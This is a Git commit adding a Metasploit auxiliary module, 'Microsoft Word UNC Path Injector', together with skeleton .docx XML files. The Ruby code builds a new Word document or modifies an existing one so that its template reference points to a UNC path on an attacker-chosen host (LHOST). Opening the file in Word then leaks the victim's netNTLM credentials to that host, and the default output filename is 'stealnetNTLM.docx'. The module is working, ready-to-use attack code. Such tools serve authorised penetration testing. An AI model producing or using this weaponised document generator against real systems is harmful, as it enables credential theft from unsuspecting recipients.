Merge branch 'aux-word_unc_injector.rb' of https://github.com/SphaZ/metasploit-framework into SphaZ-aux-word_unc_injector.rb

2013-02-11 15:05:27 +01:00 · 2013-02-11 15:05:27 +01:00 · 41564fd51d
parent 7370d7d31b 66f0bddb54
commit 41564fd51d
11 changed files with 205 additions and 0 deletions
--- a/data/exploits/docx/[Content_Types].xml
+++ b/data/exploits/docx/[Content_Types].xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types>
--- a/data/exploits/docx/_rels/.rels
+++ b/data/exploits/docx/_rels/.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
--- a/data/exploits/docx/docProps/app.xml
+++ b/data/exploits/docx/docProps/app.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>normal.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties>
--- a/data/exploits/docx/word/_rels/document.xml.rels
+++ b/data/exploits/docx/word/_rels/document.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships>
--- a/data/exploits/docx/word/document.xml
+++ b/data/exploits/docx/word/document.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t> </w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
--- a/data/exploits/docx/word/fontTable.xml
+++ b/data/exploits/docx/word/fontTable.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts>
--- a/data/exploits/docx/word/settings.xml
+++ b/data/exploits/docx/word/settings.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>
--- a/data/exploits/docx/word/styles.xml
+++ b/data/exploits/docx/word/styles.xml
--- a/data/exploits/docx/word/theme/theme1.xml
+++ b/data/exploits/docx/word/theme/theme1.xml
--- a/data/exploits/docx/word/webSettings.xml
+++ b/data/exploits/docx/word/webSettings.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings>
--- a/modules/auxiliary/docx/word_unc_injector.rb
+++ b/modules/auxiliary/docx/word_unc_injector.rb
@ -0,0 +1,185 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://Metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+require 'zip/zip' #for extracting files
+require 'rex/zip' #for creating files
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Microsoft Word UNC Path Injector',
+			'Description'    => %q{
+					This module modifies a .docx file that will, upon opening, submit all
+					stored netNTLM credentials to a remote host. It can also create an empty docx file.
+					If emailed the receiver needs to put the document in editing mode
+					before the remote server will be contacted. Preview and read-only
+					mode do not work. Verified to work with Microsoft Word 2003,
+					2007 and 2010 as of January 2013 date by using auxiliary/server/capture/smb
+			},
+			'License'        => MSF_LICENSE,
+			'References'     =>
+			[
+				[ 'URL', 'http://jedicorp.com/?p=534' ],
+			],
+			'Author'         =>
+			[
+				'SphaZ <cyberphaz[at]gmail.com>'
+			]
+		))
+
+		register_options(
+			[
+				OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.','']),
+				OptPath.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']),
+				OptString.new('FILENAME', [true, 'Document output filename.', 'stealnetNTLM.docx']),
+				OptString.new('DOCAUTHOR',[false,'Document author for empty document.', '']),
+			], self.class)
+	end
+
+	#here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
+	def make_new_file
+		metadata_file_data = ""
+		metadata_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties"
+		metadata_file_data << " xmlns:cp=\"http://schemas.openxmlformats.org/package/2006/metadata/core-properties\" "
+		metadata_file_data << "xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" "
+		metadata_file_data << "xmlns:dcmitype=\"http://purl.org/dc/dcmitype/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">"
+		metadata_file_data << "<dc:creator>#{datastore['DOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['DOCAUTHOR']}"
+		metadata_file_data << "</cp:lastModifiedBy><cp:revision>1</cp:revision><dcterms:created xsi:type=\"dcterms:W3CDTF\">"
+		metadata_file_data << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">"
+		metadata_file_data << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>"
+
+		#where to find the skeleton files required for creating an empty document
+		data_dir = File.join(Msf::Config.install_root, "data", "exploits", "docx")
+
+		#making the actual docx
+		docx = Rex::Zip::Archive.new
+		#add skeleton files
+		vprint_status("Adding skeleton files from #{data_dir}")
+		Dir["#{data_dir}/**/**"].each do |file|
+			if not File.directory?(file)
+				docx.add_file(file.sub(data_dir,''), File.read(file))
+			end
+		end
+		#add on-the-fly created documents
+		vprint_status("Adding injected files")
+		docx.add_file("docProps/core.xml", metadata_file_data)
+		docx.add_file("word/_rels/settings.xml.rels", @rels_file_data)
+		#add the otherwise skipped "hidden" file
+		file = "#{data_dir}/_rels/.rels"
+		docx.add_file(file.sub(data_dir,''), File.read(file))
+		#and lets create the file
+		file_create(docx.pack)
+	end
+
+	#here we inject an UNC path into an existing file, and store the injected file in FILENAME
+	def manipulate_file
+		ref = "<w:attachedTemplate r:id=\"rId1\"/>"
+		
+		if not File.stat(datastore['SOURCE']).readable?
+			print_error("Not enough rights to read the file. Aborting.")
+			return nil
+		end
+
+		#lets extract our docx and store it in memory
+		zip_data = unzip_docx
+
+		#file to check for reference file we need
+		file_content = zip_data["word/settings.xml"]
+		if file_content.nil?
+			print_error("Bad \"word/settings.xml\" file, check if it is a valid .docx.")
+			return nil
+		end
+
+		#if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
+		if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil?
+			vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)")
+			zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
+			# lets zip the end result
+			zip_docx(zip_data)
+		else
+			#now insert the reference to the file that will enable our malicious entry
+			insert_one = file_content.index("<w:defaultTabStop")
+
+			if insert_one.nil?
+				insert_two = file_content.index("<w:hyphenationZone") # 2nd choice
+				if not insert_two.nil?
+					vprint_status("HypenationZone found, we use this for insertion.")
+					file_content.insert(insert_two, ref )
+				end
+			else
+				vprint_status("DefaultTabStop found, we use this for insertion.")
+				file_content.insert(insert_one, ref )
+			end
+
+			if insert_one.nil? && insert_two.nil?
+				print_error("Cannot find insert point for reference into settings.xml")
+				return nil
+			end
+
+			#update the files that contain the injection and reference
+			zip_data["word/settings.xml"] = file_content
+			zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
+			#lets zip the file
+			zip_docx(zip_data)
+		end
+		return 0
+	end
+
+	#making the actual docx from the hash
+	def zip_docx(zip_data)
+		docx = Rex::Zip::Archive.new
+		zip_data.each_pair do |k,v|
+			docx.add_file(k,v)
+		end
+		file_create(docx.pack)
+	end
+
+	#unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
+	def unzip_docx
+		#Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::ZipFile
+		vprint_status("Extracting #{datastore['SOURCE']} into memory.")
+		#we read it all into memory
+		zip_data = Hash.new
+		begin
+			Zip::ZipFile.open(datastore['SOURCE'])  do |filezip|
+				filezip.each do |entry|
+					zip_data[entry.name] = filezip.read(entry)
+				end
+			end
+		rescue Zip::ZipError => e
+			print_error("Error extracting #{datastore['SOURCE']} please verify it is a valid .docx document.")
+			return nil
+		end
+		return zip_data
+	end
+
+
+	def run
+		#we need this in make_new_file and manipulate_file
+		@rels_file_data = ""
+		@rels_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp
+		@rels_file_data << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp
+		@rels_file_data << "<Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/".chomp
+		@rels_file_data << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>"
+
+		if "#{datastore['SOURCE']}" == ""
+			#make an empty file
+			print_status("Creating empty document that points to #{datastore['LHOST']}.")
+			make_new_file
+		else
+			#extract the word/settings.xml and edit in the reference we need
+			print_status("Injecting UNC path into existing document.")
+			if not manipulate_file.nil?
+				print_good("Copy of #{datastore['SOURCE']} called #{datastore['FILENAME']} points to #{datastore['LHOST']}.")
+			end
+		end
+	end
+end